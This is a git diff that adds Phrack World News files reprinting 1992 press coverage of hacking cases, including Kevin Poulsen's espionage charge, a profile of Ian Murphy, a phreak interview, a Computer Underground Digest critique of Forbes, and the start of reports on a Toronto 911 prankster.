+Bell $25,000.  He is scheduled to testify against Lottor and Poulsen as part of
+a plea bargain.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ CA Computer Whiz Is First Hacker Charged With Espionage      December 10, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by John Enders (The Associated Press)
+
+SAN JOSE, California -- A 28-year-old computer whiz who reportedly once tested
+Department of Defense security procedures has become the first alleged computer
+hacker to be charged with espionage.
+
+The government says Kevin Lee Poulsen stole classified military secrets and
+should go to prison.  But his lawyer calls him "an intellectually curious
+computer nerd."
+
+Poulsen, of Menlo Park, California, worked in the mid-1980s as a consultant
+testing Pentagon computer security.  Because of prosecution delays, he was held
+without bail in a San Jose jail for 20 months before being charged this week.
+
+His attorney, Paul Meltzer, says that Poulsen did not knowingly possess
+classified information.  The military information had been declassified by the
+time prosecutors say Poulsen obtained it, Meltzer said.
+
+"They are attempting to make him look like Julius Rosenberg," Meltzer said of
+the man executed in 1953 for passing nuclear-bomb secrets to the Soviet Union.
+"It's just ridiculous."
+
+Poulsen was arrested in 1988 on lesser but related hacking charges. He
+disappeared before he was indicted and was re-arrested in Los Angeles in April
+1991.  Under an amended indictment, he was charged with illegal possession of
+classified government secrets.
+
+Poulsen also is charged with 13 additional counts, including eavesdropping on
+private telephone conversations and stealing telephone company equipment.
+
+If convicted on all counts, he faces up to 85 years in prison and fines
+totaling $3.5 million, said Assistant U.S. Attorney Robert Crowe in San
+Francisco.
+
+On Monday (12/7), Poulsen pleaded innocent to all charges.  He was handed over
+to U.S. Marshals in San Jose on Wednesday (12/9) and was being held at a
+federal center in Pleasanton near San Francisco.
+
+He hasn't been available for comment, but in an earlier letter from prison,
+Poulsen called the charges "ludicrous" and said the government is taking
+computer hacking too seriously.
+
+U.S. Attorney John A. Mendez said Wednesday (12/9) that Poulsen is not
+suspected of turning any classified or non-classified information over to a
+foreign power, but he said Poulsen's alleged activities are being taken very
+seriously.
+
+"He's unique.  He's the first computer hacker charged with this type of
+violation -- unlawful gathering of defense information," Mendez said.
+
+Assistant U.S. Attorney Robert Crowe said the espionage charge was entered only
+after approval from the Justice Department's internal security section in
+Washington.
+
+The indictment alleges that Poulsen:
+
+- Tapped into the Pacific Bell Co.'s computer and collected unpublished
+  telephone numbers and employee lists for the Soviet Consulate in San
+  Francisco.
+
+- Stole expensive telephone switching and other equipment.
+
+- Retrieved records of phone company security personnel and checked records of
+  their own calls to see if they were following him.
+
+- Eavesdropped on telephone calls and computer electronic mail between phone
+  company investigators and some of his acquaintances.
+
+- Tapped into an unclassified military computer network known as Masnet.
+
+- Obtained a classified document on flight orders for a military exercise
+  involving thousands of paratroopers at the Army's Fort Bragg in North
+  Carolina.
+
+The offenses allegedly took place between 1986 and 1988.
+
+In 1985, the Palo Alto, California, think tank SRI International hired Poulsen
+to work on military contracts, including a sensitive experiment to test
+Pentagon computer security, according to published reports.  SRI has declined
+to comment on the case.
+_______________________________________________________________________________
+
+ Hacker For Hire                                               October 19, 1992
+ ~~~~~~~~~~~~~~~
+ by Mark Goodman and Allison Lynn (People)(Page 151)
+
+        "Real-life Sneaker Ian Murphy puts the byte on corporate spies."
+
+THERE'S NO PRIVACY THESE DAYS," says Ian Murphy.  "Just imagine going into GM's
+or IBM's accounts and wiping them out.  You can bring about economic collapse
+by dropping in a virus without them even knowing it."  Scoff at your peril,
+Corporate America.  Captain Zap -- as Murphy is known in the electronic
+underworld of computer hackers -- claims there's no computer system he can't
+crack, and hence no mechanical mischief he can't wreak on corporations or
+governments.  And Murphy, 35, has the track record -- not to mention the
+criminal record -- to back up his boasts.
+
+Murphy's fame in his subterranean world is such that he worked as a consultant
+for Sneakers, the hit film about a gang of computer-driven spies (Robert
+Redford, Sidney Poitier, Dan Aykroyd) lured into doing some high-risk
+undercover work for what they believe is the National Security Agency.
+
+Murphy loved the way the movie turned out.  "It's like a training film for
+hackers," he says, adding that he saw much of himself in the Aykroyd character,
+a pudgy, paranoid fantasist named Mother who, like Murphy, plows through
+people's trash for clues.  In fact when Aykroyd walked onscreen covered with
+trash, Murphy recalls, "My friends turned to me and said, 'Wow, that's you!'"
+If that sounds like a nerd's fantasy, then check out Captain Zap's credentials.
+Among the first Americans to be convicted of a crime involving  computer break-
+ins, he served only some easy community-service time in 1983 before heading
+down the semistraight, not necessarily narrow, path of a corporate spy.
+
+Today, Murphy, 35, is president of IAM Secure Data Systems, a security
+consultant group he formed in 1982.  For a fee of $5,000 a day plus expenses,
+Murphy has dressed up as a phone-company employee and cracked a bank's security
+system, he has aided a murder investigation for a drug dealer's court defense,
+and he has conducted a terrorism study for a major airline.  His specialty,
+though, is breaking into company security systems -- an expertise he applied
+illegally in his outlaw hacker days and now, legally, by helping companies
+guard against such potential break-ins.  Much of his work lately, he says,
+involves countersurveillance -- that is, finding out if a corporation's
+competitors are searching its computer systems for useful information.  "It's
+industrial spying," Murphy says, "and it's happening all over the place."
+
+Murphy came by his cloak-and-daggerish calling early.  He grew up in Gladwyne,
+Pennsylvania, on Philadelphia's Main Line, the son of Daniel Murphy, a retired
+owner of a stevedoring business, and his wife, Mary Ann, an advertising
+executive.  Ian recalls, "As a kid, I was bored.  In science I did wonderfully.
+The rest of it sucked.  And social skills weren't my thing."
+
+Neither was college.  Ian had already begun playing around with computers at
+Archbishop Carroll High School; after graduation he joined the Navy.  He got an
+early discharge in 1975 when the Navy didn't assign him to radio school as
+promised, and he returned home to start hacking with a few pals.  In his
+heyday, he claims, he broke into White House and Pentagon computers.  "In the
+Pentagon," he says, "we were playing in the missile department, finding out
+about the new little toys they were developing and trying to mess with their
+information. None of our break-ins had major consequences, but it woke them the
+hell up because they [had] all claimed it couldn't be done."
+
+Major consequences came later.  Murphy and his buddies created dummy
+corporations with Triple-A credit ratings and ordered thousands of dollars'
+worth of computer equipment.  Two years later the authorities knocked at
+Murphy's door.  His mother listened politely to the charges, then earnestly
+replied, "You have the wrong person.  He doesn't know anything about
+computers."
+
+Right.  Murphy was arrested and convicted of receiving stolen property in 1982.
+But because there were no federal computer-crime laws at that time, he got off
+with a third-degree felony count.  He was fined $1,000, ordered to provide
+1,000 hours of community service (he worked in a homeless shelter) and placed
+on probation for 2 1/2 years.  "I got off easy," he concedes.
+
+Too easy, by his own mother's standards.  A past president of Republican Women
+of the Main Line, Mary Ann sought out her Congressman, Larry Coughlin, and put
+the question to him: "How would you like it if the next time you ran for
+office, some young person decided he was going to change all of your files?"
+Coughlin decided he wouldn't like it and raised the issue on the floor of
+Congress in 1983.  The following year, Congress passed a national computer-
+crime law, making it illegal to use a computer in a manner not authorized by
+the owner.
+
+Meanwhile, Murphy, divorced in 1977 after a brief marriage, had married Carol
+Adrienne, a documentary film producer, in 1982.  Marriage evidently helped set
+Murphy straight, and he formed his company -- now with a staff of 12 that
+includes a bomb expert and a hostage expert.  Countersurveillance has been
+profitable (he's making more than $250,000 a year and is moving out of his
+parents' house), but it has left him little time to work on his social skills -
+- or for that matter his health.  At 5 ft.6 in. and 180 lbs., wearing jeans,
+sneakers and a baseball cap, Murphy looks like a Hollywood notion of himself.
+He has suffered four heart attacks since 1986 but unregenerately smokes a pack
+of cigarettes a day and drinks Scotch long before the sun falls over the
+yardarm.
+
+He and Carol divorced in April 1991, after 10 years of marriage.  "She got
+ethics and didn't like the work I did," he says.  These days Murphy dates --
+but not until he thoroughly "checks" the women he goes out with.  "I want to
+know who I'm dealing with because I could be dealing with plants," he explains.
+"The Secret Service plays games with hackers."
+
+Murphy does retain a code of honor.  He will work for corporations, helping to
+keep down the corporate crime rate, he says, but he won't help gather evidence
+to prosecute fellow hackers.  Indeed his rogue image makes it prudent for him
+to stay in the background.  Says Reginald Branham, 23, president of Cyberlock
+Consulting, with whom Murphy recently developed a comprehensive antiviral
+system: "I prefer not to take Ian to meetings with CEOs.  They're going to
+listen to him and say, 'This guy is going to tear us apart.'"  And yet Captain
+Zap, for all his errant ways, maintains a certain peculiar charm.  "I'm like
+the Darth Vader of the computer world," he insists.  "In the end I turn out to
+be the good guy."
+
+(Photograph 1 = Ian Murphy)
+(Photograph 2 = River Phoenix, Robert Redford, Dan Aykroyd, and Sidney Poitier)
+(Photograph 3 = Mary Ann Murphy <Ian's mom>)
+_______________________________________________________________________________
+
+ Yacking With A Hack                                                August 1992
+ ~~~~~~~~~~~~~~~~~~~
+ by Barbara Herman (Teleconnect)(Page 60)
+
+                 "Phone phreaking for fun, profit & politics."
+
+Ed is an intelligent, articulate 18 year old.  He's also a hacker, a self-
+professed "phreak" -- the term that's developed in a subculture of usually
+young, middle-class computer whizzes.
+
+I called him at his favorite phone booth.
+
+Although he explained how he hacks as well as what kinds of hacking he has been
+involved in, I was especially interested in why he hacks.
+
+First off, Ed wanted to make it clear he doesn't consider himself a
+"professional" who's in it only for the money.  He kept emphasizing that
+"hacking is not only an action, it's a state of mind."
+
+Phreaks even have an acronym-based motto that hints at their overblown opinions
+of themselves.  PHAC.  It describes what they do: "phreaking," "hacking,"
+"anarchy" and "carding."  In other words, they get into systems over the
+telecom network (phreaking), gain access (hacking), disrupt the systems
+(political anarchy) and use peoples' calling/credit cards for their personal
+use.
+
+Throughout our talk, Ed showed no remorse for hacking.  Actually, he had
+contempt for those he hacked.  Companies were "stupid" because their systems'
+were so easy to crack.  They deserved it.
+
+As if they should have been thankful for his mercy, he asked me to imagine what
+would have happened if he really hacked one railway company's system (he merely
+left a warning note), changing schedules and causing trains to collide.
+
+He also had a lot of disgust for the "system," which apparently includes big
+business (he is especially venomous toward AT&T), government, the FBI, known as
+"the Gestapo" in phreak circles, and the secret service, whose "intelligence
+reflects what their real jobs should be, secret service station attendants."
+
+He doesn't really believe any one is losing money on remote access toll fraud.
+
+He figures the carriers are angry not about money lost but rather hypothetical
+money, the money they could have charged for the free calls the hackers made,
+which he thinks are overpriced to begin with.
+
+He's also convinced (wrongly) that companies usually don't foot the bill for
+the free calls hackers rack up on their phone systems.  "And, besides, if some
+multi-million dollar corporation has to pay, I'm certainly not going to cry for
+them."
+
+I know.  A twisted kid.  Weird.  But besides his skewed ethics, there's also a
+bunch of contradictions.
+
+He has scorn for companies who can't keep him out, even though he piously warns
+them to try.
+
+He dismisses my suggestion that the "little guy" is in fact paying the bills
+instead of the carrier.  And yet he says AT&T is overcharging them for the
+"vital" right to communicate with each other.
+
+He also contradicted his stance of being for the underdog by calling the
+railway company "stupid" for not being more careful with their information.
+
+Maybe a railway company is not necessarily the "little guy," but it hardly
+seems deserving of the insults Ed hurled at it.  When I mentioned that a
+hospital in New York was taken for $100,000 by hackers, he defended the hackers
+by irrelevantly making the claim that doctors easily make $100,000 a year.
+Since when did doctors pay hospital phone bills?
+
+What Ed is good at is rationalizing.  He lessens his crimes by raising them to
+the status of political statements, and yet in the same breath, for example, he
+talks about getting insider info on the stock market and investing once he
+knows how the stock is doing.  He knows it's morally wrong, he told me, but
+urged me to examine this society that "believes in making a buck any way you
+can.  It's not a moral society."
+
+Amazingly enough, the hacker society to which Ed belongs, if I can
+unstatistically use him as a representative of the whole community, is just as
+tangled in the contradictions of capitalism as the "system" they supposedly
+loathe.  In fact, they are perhaps more deluded and hypocritical because they
+take a political stance rather than recognizing their crimes for what they are.
+How can Ed or anyone else in the "phreaking" community take seriously their
+claims of being against big business and evil capitalism when they steal
+people's credit-card and calling-card numbers and use them for their own
+profit?
+
+The conversation winded down after Ed rhapsodized about the plight of the
+martyred hacker who is left unfairly stigmatized after he is caught, or "taken
+down."
+
+One time the Feds caught his friend hacking ID codes, had several phone
+companies and police search his house, and had his computer taken away.  Even
+though charges were not filed, Ed complained, "It's not fair."
+
+That's right, phreak.  They should have thrown him in prison.
+_______________________________________________________________________________
+
+ Computer Hacker On Side Of Law                              September 23, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by Shelby Grad (Los Angeles Times)(Page B3)
+
+COSTA MESA, CA -- Philip Bettencourt's formal title is photo lab supervisor for
+the Costa Mesa Police Department.  But on Tuesday afternoon, he served as the
+department's official computer hacker.
+
+Bettencourt, pounding the keyboard excitedly as other officers looked on, was
+determined to find information within a stolen computer's vast memory that
+would link the machine to its owner.
+
+So far, he had made matches for all but two of the 26 computers recovered
+earlier this month by police as part of a countywide investigation of stolen
+office equipment.  This would be number 25.
+
+First, he checked the hard drive's directory, searching for a word-processing
+program that might include a form letter or fax cover sheet containing the
+owner's name, address or phone number.
+
+When that failed, he tapped into an accounting program, checking for clues on
+the accounts payable menu.
+
+"Bingo!"  Bettencourt yelled a few minutes into his work.  He found an invoice
+account number to a Fountain Valley cement company that might reveal the
+owner's identity.  Seconds later, he came across the owner's bank credit-card
+number.
+
+And less than a minute after that, Bettencourt hit pay dirt: The name of a
+Santa Ana building company that, when contacted, revealed that it had indeed
+been the victim of a recent computer burglary.
+
+"This is great," said Bettencourt, who has been interested in computers for
+nearly two decades now, ever since Radio Shack put its first model on the
+market.  "I love doing this.  This is hacking, but it's in a good sense, not
+trying to hurt someone.  This is helping people."
+
+Few computer owners who were reunited with their equipment would contest that.
+When Costa Mesa police recovered $250,000 worth of computers, fax machines,
+telephones and other office gadgets, detectives were faced with the difficult
+task of matching machines bearing few helpful identifying marks to their
+owners, said investigator Bob Fate.
+
+Enter Bettencourt, who tapped into the computers' hard drives, attempting to
+find the documents that would reveal from whom the machines were taken.
+
+As of Tuesday, all but $50,000 worth of equipment was back in owners' hands.
+Investigators suggested that people who recently lost office equipment call the
+station to determine if some of the recovered gadgetry belongs to them.
+
+Ironically, the alleged burglars tripped themselves up by not erasing the data
+from the computers before reselling the machines, authorities said.  A college
+student who purchased one of the stolen computers found data from the previous
+owner, whom he contacted.  Police were then called in, and a second "buy" was
+scheduled in which several suspects were arrested, Fate said.
+
+Three people were arrested September 15 and charged with receiving and
+possessing stolen property.  Police are still searching for the burglars.
+
+The office equipment was recovered from an apartment and storage facility in
+Santa Ana.
+
+Bettencourt matched the final stolen computer to its owner before sundown
+Tuesday.
+_______________________________________________________________________________
+
+ CuD's 1992 MEDIA HYPE Award To FORBES MAGAZINE
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by Jim Thomas (Computer Underground Digest)
+
+In recent years, media depiction of "hackers" has been criticized for
+inaccurate and slanted reporting that exaggerates the public dangers of the
+dread "hacker menace." As a result, CuD annually recognizes the year's most
+egregious example of media hype.
+
+The 1992 annual CuD GERALDO RIVERA MEDIA HYPE award goes to WILLIAM G. FLANAGAN
+AND BRIGID McMENAMIN for their article "The Playground Bullies are Learning how
+to Type" in the 21 December issue of Forbes (pp 184-189).  The authors improved
+upon last year's winner, Geraldo himself, in inflammatory rhetoric and
+distorted narrative that seems more appropriate for a segment of "Inside
+Edition" during sweeps week than for a mainstream conservative periodical.
+
+The Forbes piece is the hands-down winner for two reasons.  First, one reporter
+of the story, Brigid McMenamin, was exceptionally successful in creating for
+herself an image as clueless and obnoxious. Second, the story itself was based
+on faulty logic, rumors, and some impressive leaps of induction.  Consider the
+following.
+
+
+                         The Reporter: Brigid McMenamin
+
+It's not only the story's gross errors, hyperbole, and irresponsible distortion
+that deserve commendation/condemnation, but the way that Forbes reporter Brigid
+McMenamin tried to sell herself to solicit information.
+
+One individual contacted by Brigid McM claimed she called him several times
+"bugging" him for information, asking for names, and complaining because
+"hackers" never called her back.  He reports that she explicitly stated that
+her interest was limited to the "illegal stuff" and the "crime aspect" and was
+oblivious to facts or issues that did not bear upon hackers-as-criminals.
+
+Some persons present at the November 2600 meeting at Citicorp, which she
+attended, suggested the possibility that she used another reporter as a
+credibility prop, followed some of the participants to dinner after the
+meeting, and was interested in talking only about illegal activities. One
+observer indicated that those who were willing to talk to her might not be the
+most credible informants.  Perhaps this is one reason for her curious language
+in describing the 2600 meeting.
+
+Another person she contacted indicated that she called him wanting names of
+people to talk to and indicated that because Forbes is a business magazine, it
+only publishes the "truth."  Yet, she seemed not so much interested in "truth,"
+but in finding "evidence" to fit a story.  He reports that he attempted to
+explain that hackers generally are interested in Unix and she asked if she
+could make free phone calls if she knew Unix.  Although the reporter stated to
+me several times that she had done her homework, my own conversation with her
+contradicted her claims, and if the reports of others are accurate, here claims
+of preparation seem disturbingly exaggerated.
+
+I also had a rather unpleasant exchange with Ms. McM.  She was rude, abrasive,
+and was interested in obtaining the names of "hackers" who worked for or as
+"criminals." Her "angle" was clearly the hacker-as-demon.  Her questions
+suggested that she did not understand the culture about which she was writing.
+She would ask questions and then argue about the answer, and was resistant to
+any "facts" or responses that failed to focus on "the hacker criminal." She
+dropped Emmanuel Goldstein's name in a way that I interpreted as indicating a
+closer relationship than she had--an incidental sentence, but one not without
+import -- which I later discovered was either an inadvertently misleading
+choice of words or a deliberate attempt to deceptively establish credentials.
+She claimed she was an avowed civil libertarian.  I asked why, then, she didn't
+incorporate some of those issues. She invoked publisher pressure.  Forbes is a
+business magazine, she said, and the story should be of interest to readers.
+She indicated that civil liberties weren't related to "business."  She struck
+me as exceptionally ill-informed and not particularly good at soliciting
+information.  She also left a post on Mindvox inviting "hackers" who had been
+contacted by "criminals" for services to contact her.
+
+     >Post: 150 of 161
+     >Subject: Hacking for Profit?
+     >From: forbes (Forbes Reporter)
+     >Date: Tue, 17 Nov 92 13:17:34 EST
+     >
+     >Hacking for Profit?  Has anyone ever offered to pay you (or
+     >a friend) to get into a certain system and alter, destroy or
+     >retrieve information?  Can you earn money hacking credit
+     >card numbers, access codes or other information? Do you know
+     >where to sell it?  Then I'd like to hear from you.  I'm
+     >doing research for a magazine article.  We don't need you
+     >name.  But I do want to hear your story.  Please contact me
+     >Forbes@mindvox.phantom.com.
+
+However, apparently she wasn't over-zealous about following up her post or
+reading the Mindvox conferences.  When I finally agreed to send her some
+information about CuD, she insisted it be faxed rather than sent to Mindvox
+because she was rarely on it.  Logs indicate that she made only six calls to
+the board, none of which occurred after November 24.
+
+My own experience with the Forbes reporter was consistent with those of others.
+She emphasized "truth" and "fact-checkers," but the story seems short on both.
+She emphasized explicitly that her story would *not* be sensationalistic. She
+implied that she wanted to focus on criminals and that the story would have the
+effect of presenting the distinction between "hackers" and real criminals.
+Another of her contacts also appeared to have the same impression.  After our
+less-than-cordial discussion, she reported it to the contact, and he attempted
+to intercede on her behalf in the belief that her intent was to dispel many of
+the media inaccuracies about "hacking."  If his interpretation is correct, then
+she deceived him as well, because her portrayal of him in the story was
+unfavorably misleading.
+
+In CuD 4.45 (File #3), we ran Mike Godwin's article on "How to Talk to the
+Press," which should be required reading. His guidelines included:
+
+     1) TRY TO THINK LIKE THE REPORTER YOU'RE TALKING TO.
+     2) IF YOU'RE GOING TO MEET THE REPORTER IN PERSON, TRY TO
+        BRING SOMETHING ON PAPER.
+     3) GIVE THE REPORTER OTHER PEOPLE TO TALK TO, IF POSSIBLE.
+     4) DON'T ASSUME THAT THE REPORTER WILL COVER THE STORY THE WAY
+        YOU'D LIKE HER TO.
+
+Other experienced observers contend that discussing "hacking" with the press
+should be avoided unless one knows the reporter well or if the reporter has
+established sufficient credentials as accurate and non-sensationalist.  Using
+these criteria, it will probably be a long while before any competent
+cybernaught again speaks to Brigid McMenamin.
+
+
+                                   The Story
+
+Rather than present a coherent and factual story about the types of computer
+crime, the authors instead make "hackers" the focal point and use a narrative
+strategy that conflates all computer crime with "hackers."
+
+The story implies that Len Rose is part of the "hacker hood" crowd.  The lead
+reports Rose's prison experience and relates his feeling that he was "made an
+example of" by federal prosecutors.  But, asks the narrative, if this is so,
+then why is the government cracking down? Whatever else one might think of Len
+Rose, no one ever has implied that he as a "playground bully" or "hacker hood."
+The story also states that 2600 Magazine editor Emmanuel Goldstein "hands
+copies <of 2600> out free of charge to kids.  Then they get arrested." (p. 188-
+-a quote attributed to Don Delaney), and distorts (or fabricates) facts to fit
+the slant:
+
+     According to one knowledgeable source, another hacker brags
+     that he recently found a way to get into Citibank's
+     computers. For three months he says he quietly skimmed off a
+     penny or so from each account. Once he had $200,000, he quit.
+     Citibank says it has no evidence of this incident and we
+     cannot confirm the hacker's story.  But, says computer crime
+     expert Donn Parker of consultants SRI International: "Such a
+     'salami attack' is definitely possible, especially for an
+     insider" (p. 186).
+
+Has anybody calculated how many accounts one would have to "skim" a few pennies
+from before obtaining $200,000?  At a dime apiece, that's over 2 million.  If
+I'm figuring correctly, at one minute per account, 60 accounts per minute non-
+stop for 24 hours a day all year, it would take nearly 4 straight years of on-
+line computer work for an out-sider.  According to the story, it took only 3
+months.  At 20 cents an account, that's over a million accounts.
+
+Although no names or evidence are given, the story quotes Donn Parker of SRI as
+saying that the story is a "definite possibility."  Over the years, there have
+been cases of skimming, but as I remember the various incidents, all have been
+inside jobs and few, if any, involved hackers.  The story is suspiciously
+reminiscent of the infamous "bank cracking" article published in Phrack as a
+spoof several years ago.
+
+The basis for the claim that "hacker hoods" (former "playground bullies") are
+now dangerous is based on a series of second and third-hand rumors and myths.
+The authors then list from "generally reliable press reports" a half-dozen or
+so non-hacker fraud cases that, in context, would seem to the casual reader to
+be part of the "hacker menace." I counted in the article at least 24 instances
+of half-truths, inaccuracies, distortions, questionable/spurious links, or
+misleading claims that are reminiscent of 80s media hype. For example, the
+article attributes to Phiber Optik counts in the MOD indictment that do not
+include him, misleads on the Len Rose indictment and guilty plea, uses second
+and third hand information as "fact" without checking the reliability, and
+presents facts out of context (such as attributing the Morris Internet worm to
+"hackers).
+
+Featured as a key "hacker hood" is "Kimble," a German hacker said by some to be
+sufficiently media-hungry and self-serving that he is ostracized by other
+German hackers. His major crime reported in the story is hacking into PBXes.
+While clearly wrong, his "crime" hardly qualifies him for the "hacker
+hood/organized crime" danger that's the focus of the story. Perhaps he is
+engaged in other activities unreported by the authors, but it appears he is
+simply a run-of-the-mill petty rip-off artist. In fact, the authors do not make
+much of his crimes. Instead, they leap to the conclusion that "hackers" do the
+same thing and sell the numbers "increasingly" to criminals without a shred of
+evidence for the leap.  To be sure the reader understands the menace, the
+authors also invoke unsubstantiated images of a hacker/Turkish Mafia connection
+and suggest that during the Gulf war, one hacker was paid "millions" to invade
+a Pentagon computer and retrieve information from a spy satellite (p. 186).
+
+Criminals use computers for crime. Some criminals may purchase numbers from
+others. But the story paints a broader picture, and equates all computer crime
+with "hacking."  The authors' logic seems to be that if a crime is committed
+with a computer, it's a hacking crime, and therefore computer crime and
+"hackers" are synonymous.  The story ignores the fact that most computer crime
+is an "inside job" and it says nothing about the problem of security and how
+the greatest danger to computer systems is careless users.
+
+One short paragraph near the end mentions the concerns about civil liberties,
+and the next paragraph mentions that EFF was formed to address these concerns.
+However, nothing in the article articulates the bases for these concerns.
+Instead, the piece promotes the "hacker as demon" mystique quite creatively.
+
+The use of terms such as "new hoods on the block," "playground bullies," and
+"hacker hoods" suggests that the purpose of the story was to find facts to fit
+a slant.
+
+In one sense, the authors might be able to claim that some of their "facts"
+were accurate.  For example, the "playground bullies" phrase is attributed to
+Cheshire Catalyst.  "Gee, *we* didn't say it!"  But, they don't identify
+whether it's the original CC or not.  The phrase sounds like a term used in
+recent internecine "hacker group" bickering, and if this was the context, it
+hardly describes any new "hacker culture."  Even so, the use of the phrase
+would be akin to a critic of the Forbes article referring to it as the product
+of "media whores who are now getting paid for doing what they used to do for
+free," and then applying the term "whores" to the authors because, hey, I
+didn't make up the term, somebody else did, and I'm just reporting (and using
+it as my central metaphor) just the way it was told to me.  However, I suspect
+that neither Forbes' author would take kindly to being called a whore because
+of the perception that they prostituted journalistic integrity for the pay-off
+of a sexy story.  And this is what's wrong with the article: The authors take
+rumors and catch-phrases, "merely report" the phrases, but then construct
+premises around the phrases *as if* they were true with little (if any)
+evidence.  They take an unconfirmed "truth" (where are fact checkers when you
+need them) or an unrelated "fact" (such as an example of insider fraud) and
+generalize from a discrete fact to a larger population. The article is an
+excellent bit of creative writing.
+
+
+                            Why Does It All Matter?
+
+Computer crime is serious, costly, and must not be tolerated.  Rip-off is no
+joke.  But, it helps to understand a problem before it can be solved, and lack
+of understanding can lead to policies and laws that are not only ineffective,
+but also a threat to civil liberties.  The public should be accurately informed
+of the dangers of computer crime and how it can be prevented. However, little
+will be served by creating demons and falsely attributing to them the sins of
+others.  It is bad enough that the meaning" of the term "hacker" has been used
+to apply both to both computer delinquents and creative explorers without also
+having the label extended to include all other forms of computer criminals as
+well.
+
+CPSR, the EFF, CuD, and many, many others have worked, with some success, to
+educate the media about both dangers of computer crime and the dangers of
+inaccurately reporting it and attributing it to "hackers."  Some, perhaps most,
+reporters take their work seriously, let the facts speak to them, and at least
+make a good-faith effort not to fit their "facts" into a narrative that--by one
+authors' indication at least -- seems to have been predetermined.
+
+Contrary to billing, there was no evidence in the story, other than
+questionable rumor, of "hacker" connection to organized crime.  Yet, this type
+of article has been used by legislators and some law enforcement agents to
+justify a "crackdown" on conventional hackers as if they were the ultimate
+menace to society.  Forbes, with a paid circulation of over 735,000 (compared
+to CuDs unpaid circulation of only 40,000), reaches a significant and
+influential population.  Hysterical stories create hysterical images, and these
+create hysteria-based laws that threaten the rights of law-abiding users.  When
+a problem is defined by irresponsibly produced images and then fed to the
+public, it becomes more difficult to overcome policies and laws that restrict
+rights in cyberspace.
+
+The issue is not whether "hackers" are or are not portrayed favorably.  Rather,
+the issue is whether images reinforce a witch-hunt mentality that leads to the
+excesses of Operation Sun Devil, the Steve Jackson Games fiasco, or excessive
+sentences for those who are either law-abiding or are set up as scapegoats.
+The danger of the Forbes article is that it contributes to the persecution of
+those who are stigmatized not so much for their acts, but rather for the signs
+they bear.
diff --git a/phrack41/13.txt b/phrack41/13.txt
new file mode 100644
index 0000000..0132e8c
--- /dev/null
+++ b/phrack41/13.txt
@@ -0,0 +1,767 @@
+                                ==Phrack Inc.==
+
+                  Volume Four, Issue Forty-One, File 13 of 13
+
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+              PWN                                             PWN
+              PWN              Phrack World News              PWN
+              PWN                                             PWN
+              PWN           Issue 41 / Part 3 of 3            PWN
+              PWN                                             PWN
+              PWN        Compiled by Datastream Cowboy        PWN
+              PWN                                             PWN
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+ Boy, 15, Arrested After 911 Paralyzed By Computer Hacker       October 7, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by Caroline Mallan (The Toronto Star)(Page A22)
+
+A 15-year-old boy has been arrested after a hacker pulling computer pranks
+paralyzed Metro's emergency 911 service.
+
+Police with Metro's major crime unit investigated the origin of countless calls
+placed to the 911 service from mid-July through last month.
+
+The calls were routed to emergency services in the Etobicoke area, said
+Detective Willie Johnston, who led the investigation.
+
+Phony medical emergency calls were reported and police, fire and ambulance
+crews were dispatched on false alarms.  On one occasion, the computer hacker
+managed to tie up the entire 911 service in Metro -- making it unavailable for
+true emergencies.
+
+Police were not sure last night how long the system was shut down for but
+Johnston said the period was considerable.
+
+Staff Sergeant Mike Sale warned hackers that phony calls can be traced.
+
+"A criminal abuse of the 911 emergency system will result in a criminal
+investigation and will result in an arrest," Sale said, adding police had only
+been investigating this hacker for a few weeks before they came up with a
+suspect.
+
+Bell Canada investigators helped police to trace the origin of the calls and
+officers yesterday arrested a teen while he was in his Grade 11 class at a
+North York high school.
+
+Two computers were seized from the boy's home and will be sent to Ottawa to be
+analyzed.
+
+Johnston said police are concerned that other hackers may also be able to halt
+the 911 service, since the computer technology used was fairly basic, although
+the process of rerouting the calls from a home to the Etobicoke emergency lines
+was very complex.
+
+The calls went via computer modem through two separate phone systems in major
+U.S. cities before being sent back to Canada, Johnston explained.
+
+The suspect, who cannot be named under the Young Offenders Act, is charged with
+theft of telecommunications, 24 counts of mischief and 10 counts of conveying
+false messages.
+
+He was released from custody and will appear in North York youth court November
+6, police said.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ Police Say They've Got Hackers' Number                         October 8, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by John Deverell (The Toronto Star)(Page A8)
+
+      Hackers, take note.  Metro police and Ma Bell are going to get you.
+
+A young North York computer freak accused of launching 10 false medical alerts
+to 911 this summer may have learned -- the hard way -- that his telephone
+tricks weren't beating the pros.
+
+Police arrived with a search warrant at the home of the 15-year-old, arrested
+him and carted away his computer.
+
+He's charged with 10 counts of conveying false messages, 24 counts of mischief,
+and theft of telecommunications.
+
+Inspector Bill Holdridge, of 911 emergency services, said the false alarms in
+July and August never posed any technical problem to his switchboard but
+resulted in wild goose chases for the police, fire and ambulance services.
+
+"Those resources weren't available for real alarms, which could have been a
+serious problem," Holdridge said.
+
+The 911 service, quartered at 590 Jarvis Street, gets about 7,000 calls a day,
+of which 30% warrant some kind of emergency response.
+
+Normally, a computerized tracing system takes only seconds to provide the
+address and number of the telephone from which a call originates -- unless the
+point of origin has been somehow disguised.
+
+Apparently the 911 prankster got into the telephone system illegally and routed
+his calls through several U.S. networks before bringing them back to Toronto.
+
+Detective Willie Johnston said the boy's parents were stunned when police
+arrived.  "They really didn't have a clue what was going on," said Johnston.
+
+The false emergencies reported were nowhere near the accused boy's home.
+"Without condoning it, you could understand it if he were sitting around the
+corner watching the flashing lights," said Johnston.  "But they were miles
+away. It defies logic."
+
+Neither Johnston nor Holdridge would explain how they and Bell security finally
+traced the false alarms. "That might just make other hackers try to figure out
+another way," Holdridge said.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ Hackers Targeted 911 Systems, Police Say                      October 10, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ Taken from United Press International
+
